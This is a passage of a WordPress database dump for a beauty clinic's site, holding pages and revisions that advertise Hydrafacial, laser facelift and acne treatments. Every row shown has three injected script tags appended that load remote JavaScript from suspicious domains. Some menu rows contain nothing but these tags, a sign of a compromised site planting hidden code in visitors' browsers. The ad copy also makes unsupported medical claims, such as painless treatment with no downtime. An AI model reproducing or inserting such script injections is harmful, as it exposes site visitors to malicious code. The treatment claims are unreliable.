to stays at there.\r\n\r\nAcne must have been acquainted with each person\'s face. But their arrival, would not be welcomed nice right? Various methods are used to throw them away from the face. Start from providing medicine, use a special soap to wash the face, to the most severe to solve acne by force. In the end, acne will spread to all areas of the face if it is carelessly handled.\r\n\r\nThe other way that most people do nowadays are Facial. A bit info, Facial handling can cause pain and also cause many side effects such as irritation, redness, allergies and can even grow more acne. If so, is there any treatment that is painless and also minimal side effects?\r\n\r\nMedikpro introducing Hydrafacial as beauty solutions nowadays that are free of pain because of the tools used in the form of vacuum which soften the dirt that can easily raised without having to suppress. Hydrafacial is the latest beauty technologies using hydra-dermabrasion techniques to cleanse, exfoliate dead skin cells, moisturize and provide a variety of nutrients such as antioxidants, aloe vera and vitamins needed by a conductive skin serum into the skin at the same time.\r\n\r\nHydrafacial has known and be one of most favourite treatment for many Hollywood Celebrity such as Paris Hilton, Beyonce, Eva Mendes, and many more. With Hydrafacial, get the rid of acne sensation that is safe and comfortable for Your face without pain. Make sure You select the proper treatment, because Your face needs to be given the best care.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydrafacial','','inherit','closed','closed','','6423-revision-v1','','','2017-12-28 03:02:34','2017-12-28 03:02:34','',6423,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6423-revision-v1/',0,'revision','',0),(6425,1,'2017-12-28 03:03:11','2017-12-28 03:03:11',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6425','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6425',27,'nav_menu_item','',0),(6426,1,'2017-12-28 03:05:38','2017-12-28 03:05:38','Loved by Hollywood celebrities like Madonna, Eva Longoria, Katty Perry and many more. With hyperbaric oxygen, a combination of Hyaluronic Acid, Aloe Vera, and Vitamins are delivered deep into the skin structural layers. Your skin will instantly become brighter, firmer, and younger.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Intraceutical Oxygen Therapy','','publish','closed','closed','','aesthetic-solutions-3-10','','','2017-12-28 03:05:38','2017-12-28 03:05:38','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6426',0,'page','',0),(6427,1,'2017-12-28 03:05:38','2017-12-28 03:05:38','Loved by Hollywood celebrities like Madonna, Eva Longoria, Katty Perry and many more. With hyperbaric oxygen, a combination of Hyaluronic Acid, Aloe Vera, and Vitamins are delivered deep into the skin structural layers. Your skin will instantly become brighter, firmer, and younger.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Intraceutical Oxygen Therapy','','inherit','closed','closed','','6426-revision-v1','','','2017-12-28 03:05:38','2017-12-28 03:05:38','',6426,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6426-revision-v1/',0,'revision','',0),(6428,1,'2017-12-28 03:06:26','2017-12-28 03:06:26',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6428','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6428',28,'nav_menu_item','',0),(6429,1,'2017-12-28 03:07:31','2017-12-28 03:07:31','Either you wantb to look youngers as you feel on the inside or you have big event coming up, RED CARPET treatment by MedikPro will give you instant result – making your face look radiant, glowing and plumping. It will also enhance your make up to another level and keep it last longer.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Red Carpet Facial','','publish','closed','closed','','aesthetic-solutions-3-11','','','2017-12-28 03:07:31','2017-12-28 03:07:31','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6429',0,'page','',0),(6430,1,'2017-12-28 03:07:31','2017-12-28 03:07:31','Either you wantb to look youngers as you feel on the inside or you have big event coming up, RED CARPET treatment by MedikPro will give you instant result – making your face look radiant, glowing and plumping. It will also enhance your make up to another level and keep it last longer.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Red Carpet Facial','','inherit','closed','closed','','6429-revision-v1','','','2017-12-28 03:07:31','2017-12-28 03:07:31','',6429,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6429-revision-v1/',0,'revision','',0),(6431,1,'2017-12-28 03:08:13','2017-12-28 03:08:13',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6431','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6431',29,'nav_menu_item','',0),(6432,1,'2017-12-28 03:11:27','2017-12-28 03:11:27','Giving a gentle exfollation with Diamond Microderm, serum infusion and mask to make your skin and smooter and brighter.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Ultra Bright Facial With Diamond Microderm','','publish','closed','closed','','aesthetic-solutions-3-12','','','2017-12-28 03:11:27','2017-12-28 03:11:27','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6432',0,'page','',0),(6433,1,'2017-12-28 03:11:27','2017-12-28 03:11:27','Giving a gentle exfollation with Diamond Microderm, serum infusion and mask to make your skin and smooter and brighter.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Ultra Bright Facial With Diamond Microderm','','inherit','closed','closed','','6432-revision-v1','','','2017-12-28 03:11:27','2017-12-28 03:11:27','',6432,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6432-revision-v1/',0,'revision','',0),(6434,1,'2017-12-28 03:13:38','2017-12-28 03:13:38',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6434','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6434',30,'nav_menu_item','',0),(6435,1,'2017-12-28 03:19:41','2017-12-28 03:19:41','A complete facial treatment with a special serum and mask to boost the collagen of the skin, and a radio frequency to make the skin even tighter and firner<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Collagen Booster Facial with Radio Frequency','','publish','closed','closed','','aesthetic-solutions-3-13','','','2017-12-28 03:19:41','2017-12-28 03:19:41','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6435',0,'page','',0),(6436,1,'2017-12-28 03:19:41','2017-12-28 03:19:41','A complete facial treatment with a special serum and mask to boost the collagen of the skin, and a radio frequency to make the skin even tighter and firner<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Collagen Booster Facial with Radio Frequency','','inherit','closed','closed','','6435-revision-v1','','','2017-12-28 03:19:41','2017-12-28 03:19:41','',6435,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6435-revision-v1/',0,'revision','',0),(6437,1,'2017-12-28 03:21:14','2017-12-28 03:21:14',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6437','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6437',31,'nav_menu_item','',0),(6438,1,'2017-12-28 03:22:04','2017-12-28 03:22:04','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Laser Therapy','','inherit','closed','closed','','6275-revision-v1','','','2017-12-28 03:22:04','2017-12-28 03:22:04','',6275,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6275-revision-v1/',0,'revision','',0),(6439,1,'2017-12-28 03:23:04','2017-12-28 03:23:04','As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\n&nbsp;\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','publish','closed','closed','','aesthetic-solutions-4-2','','','2017-12-28 03:23:04','2017-12-28 03:23:04','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6439',0,'page','',0),(6440,1,'2017-12-28 03:23:04','2017-12-28 03:23:04','As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\n&nbsp;\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6439-revision-v1','','','2017-12-28 03:23:04','2017-12-28 03:23:04','',6439,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6439-revision-v1/',0,'revision','',0),(6441,1,'2017-12-28 03:25:17','2017-12-28 03:25:17',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6441','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6441',33,'nav_menu_item','',0),(6442,1,'2017-12-28 03:26:42','2017-12-28 03:26:42','6 Step Laser Therapy within one session with advance European laser machine, resulting in Face Lift, Great Tightening, impove the skin color tone and stimulating new collagen to increased elasticity of skin for the younger looking you with a pearl finish to the skin.\r\n\r\nDown time : a light exfoliation will be 5-7 days.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','6D Laser Complete Rejuvenation','','publish','closed','closed','','aesthetic-solutions-4-3','','','2017-12-28 03:26:42','2017-12-28 03:26:42','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6442',0,'page','',0),(6443,1,'2017-12-28 03:26:42','2017-12-28 03:26:42','6 Step Laser Therapy within one session with advance European laser machine, resulting in Face Lift, Great Tightening, impove the skin color tone and stimulating new collagen to increased elasticity of skin for the younger looking you with a pearl finish to the skin.\r\n\r\nDown time : a light exfoliation will be 5-7 days.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','6D Laser Complete Rejuvenation','','inherit','closed','closed','','6442-revision-v1','','','2017-12-28 03:26:42','2017-12-28 03:26:42','',6442,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6442-revision-v1/',0,'revision','',0),(6444,1,'2017-12-28 03:27:06','2017-12-28 03:27:06',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6444','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6444',34,'nav_menu_item','',0),(6445,1,'2017-12-28 03:28:38','2017-12-28 03:28:38','The signs of ageing are different in each individual. You never know what’s coming next. From fine lines and wrinkles to sunspots and pores will show up in Your face. But, Whatever the troubles that came into Your face, Our Experts can improve Your appearance and give You the great results in just a few weeks with 3D Laser Rejuvenation.\r\n\r\nIntroducing 3D Laser Rejuvenation, a world class system developed by expert beauticians and designed to treat multiple skin problems. This treatment will grant a healthy and youthful appearances. How does this thing work?\r\n\r\nThere are three tiers of 3D Laser Rejuvenation :\r\n<ol>\r\n 	<li>IPL (Intense Pulse Light)</li>\r\n</ol>\r\nOr also known as LimeLight procedure is a light-based procedure designed to reduce vascular lesions and hyperpigmentation such as redness, freckles, spider vein, sun damage, agespots and other signs ageing and skin degradation from the top layer of skin. This treatment can quickly restore a glowing radiance to the face, neck, chest, arms and hands.\r\n<ol start=\"2\">\r\n 	<li>Laser Genesis</li>\r\n</ol>\r\nLaser Genesis is a restorative treatment using energy to heat the middle layers of the skin, also improve the tone and texture of the skin by encouraging the collagen inside the body. While the LimeLight primarily corrects tone, the Laser Genesis optimizes skin textures.\r\n<ol start=\"3\">\r\n 	<li>Titan Skin Tightening</li>\r\n</ol>\r\nAdds the finishing touch by softening any remnants of fine lines, wrinkles and pores, discoloration and redness with Titan Skin Tightening. This treatment can stimulate the body’s production of Collagen also giving You a powerful combination of natural revitalization.\r\n\r\nThe treatment can be customized to the needs of individual skin types and conditions. Grab this complete treatment at Medikpro! Let Us hear Your needs and we will give You the results You expect.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','3D Laser Rejuvenation','','publish','closed','closed','','aesthetic-solutions-4-4','','','2017-12-28 03:28:38','2017-12-28 03:28:38','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6445',0,'page','',0),(6446,1,'2017-12-28 03:28:38','2017-12-28 03:28:38','The signs of ageing are different in each individual. You never know what’s coming next. From fine lines and wrinkles to sunspots and pores will show up in Your face. But, Whatever the troubles that came into Your face, Our Experts can improve Your appearance and give You the great results in just a few weeks with 3D Laser Rejuvenation.\r\n\r\nIntroducing 3D Laser Rejuvenation, a world class system developed by expert beauticians and designed to treat multiple skin problems. This treatment will grant a healthy and youthful appearances. How does this thing work?\r\n\r\nThere are three tiers of 3D Laser Rejuvenation :\r\n<ol>\r\n 	<li>IPL (Intense Pulse Light)</li>\r\n</ol>\r\nOr also known as LimeLight procedure is a light-based procedure designed to reduce vascular lesions and hyperpigmentation such as redness, freckles, spider vein, sun damage, agespots and other signs ageing and skin degradation from the top layer of skin. This treatment can quickly restore a glowing radiance to the face, neck, chest, arms and hands.\r\n<ol start=\"2\">\r\n 	<li>Laser Genesis</li>\r\n</ol>\r\nLaser Genesis is a restorative treatment using energy to heat the middle layers of the skin, also improve the tone and texture of the skin by encouraging the collagen inside the body. While the LimeLight primarily corrects tone, the Laser Genesis optimizes skin textures.\r\n<ol start=\"3\">\r\n 	<li>Titan Skin Tightening</li>\r\n</ol>\r\nAdds the finishing touch by softening any remnants of fine lines, wrinkles and pores, discoloration and redness with Titan Skin Tightening. This treatment can stimulate the body’s production of Collagen also giving You a powerful combination of natural revitalization.\r\n\r\nThe treatment can be customized to the needs of individual skin types and conditions. Grab this complete treatment at Medikpro! Let Us hear Your needs and we will give You the results You expect.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','3D Laser Rejuvenation','','inherit','closed','closed','','6445-revision-v1','','','2017-12-28 03:28:38','2017-12-28 03:28:38','',6445,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6445-revision-v1/',0,'revision','',0),(6447,1,'2017-12-28 03:29:10','2017-12-28 03:29:10',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6447','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6447',35,'nav_menu_item','',0),(6448,1,'2017-12-28 03:31:26','2017-12-28 03:31:26','3 Step Laser Therapy within one session with advance European laser machine, resulting in Face Lift, Great Tightening, impove the skin color tone and stimulating new collagen to increased elasticity of skin for the younger looking you with a pearl finish to the skin.\r\n\r\nDown time : a light exfoliation will be 5-7 days.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','3D Laser Pore','','publish','closed','closed','','aesthetic-solutions-4-5','','','2017-12-28 03:31:26','2017-12-28 03:31:26','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6448',0,'page','',0),(6449,1,'2017-12-28 03:31:26','2017-12-28 03:31:26','3 Step Laser Therapy within one session with advance European laser machine, resulting in Face Lift, Great Tightening, impove the skin color tone and stimulating new collagen to increased elasticity of skin for the younger looking you with a pearl finish to the skin.\r\n\r\nDown time : a light exfoliation will be 5-7 days.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','3D Laser Pore','','inherit','closed','closed','','6448-revision-v1','','','2017-12-28 03:31:26','2017-12-28 03:31:26','',6448,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6448-revision-v1/',0,'revision','',0),(6450,1,'2017-12-28 03:34:29','2017-12-28 03:34:29',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6450','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6450',36,'nav_menu_item','',0),(6451,1,'2017-12-28 03:35:00','2017-12-28 03:35:00','Pore Tightening Laser<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Pore Tightening Laser','','publish','closed','closed','','aesthetic-solutions-4-6','','','2017-12-28 03:35:00','2017-12-28 03:35:00','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6451',0,'page','',0),(6452,1,'2017-12-28 03:35:00','2017-12-28 03:35:00','Pore Tightening Laser<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Pore Tightening Laser','','inherit','closed','closed','','6451-revision-v1','','','2017-12-28 03:35:00','2017-12-28 03:35:00','',6451,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6451-revision-v1/',0,'revision','',0),(6453,1,'2017-12-28 03:47:17','2017-12-28 03:47:17',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6453','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6453',37,'nav_menu_item','',0),(6454,1,'2017-12-28 03:48:10','2017-12-28 03:48:10','3 Step Laser Therapy within one session with advance European laser machine, resulting in pore tightening, improve skin color and increased elasticity of skin for the younger looking you with a pearl finish to the skin.\r\n\r\nDown time: a light exfoliation will be 5-7 days.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','3D Laser Acne','','publish','closed','closed','','aesthetic-solutions-4-7','','','2017-12-28 03:48:10','2017-12-28 03:48:10','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6454',0,'page','',0),(6455,1,'2017-12-28 03:48:10','2017-12-28 03:48:10','3 Step Laser Therapy within one session with advance European laser machine, resulting in pore tightening, improve skin color and increased elasticity of skin for the younger looking you with a pearl finish to the skin.\r\n\r\nDown time: a light exfoliation will be 5-7 days.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','3D Laser Acne','','inherit','closed','closed','','6454-revision-v1','','','2017-12-28 03:48:10','2017-12-28 03:48:10','',6454,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6454-revision-v1/',0,'revision','',0),(6456,1,'2018-01-03 03:45:28','2018-01-03 03:45:28','3 Step Laser Therapy within one session with advance European laser machine, resulting in pore tightening, improve skin color and increased elasticity of skin for the younger looking you with a pearl finish to the skin.\r\n\r\nDown time: a light exfoliation will be 5-7 days.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','3D Laser Acne','','publish','closed','closed','','aesthetic-solutions-4-8','','','2018-01-03 03:45:28','2018-01-03 03:45:28','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6456',0,'page','',0),(6457,1,'2018-01-03 03:45:28','2018-01-03 03:45:28','3 Step Laser Therapy within one session with advance European laser machine, resulting in pore tightening, improve skin color and increased elasticity of skin for the younger looking you with a pearl finish to the skin.\r\n\r\nDown time: a light exfoliation will be 5-7 days.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','3D Laser Acne','','inherit','closed','closed','','6456-revision-v1','','','2018-01-03 03:45:28','2018-01-03 03:45:28','',6456,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6456-revision-v1/',0,'revision','',0),(6458,1,'2018-01-03 03:46:10','2018-01-03 03:46:10',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6458','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6458',38,'nav_menu_item','',0),(6459,1,'2018-01-03 03:47:22','2018-01-03 03:47:22','Clear Acne Laser<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' 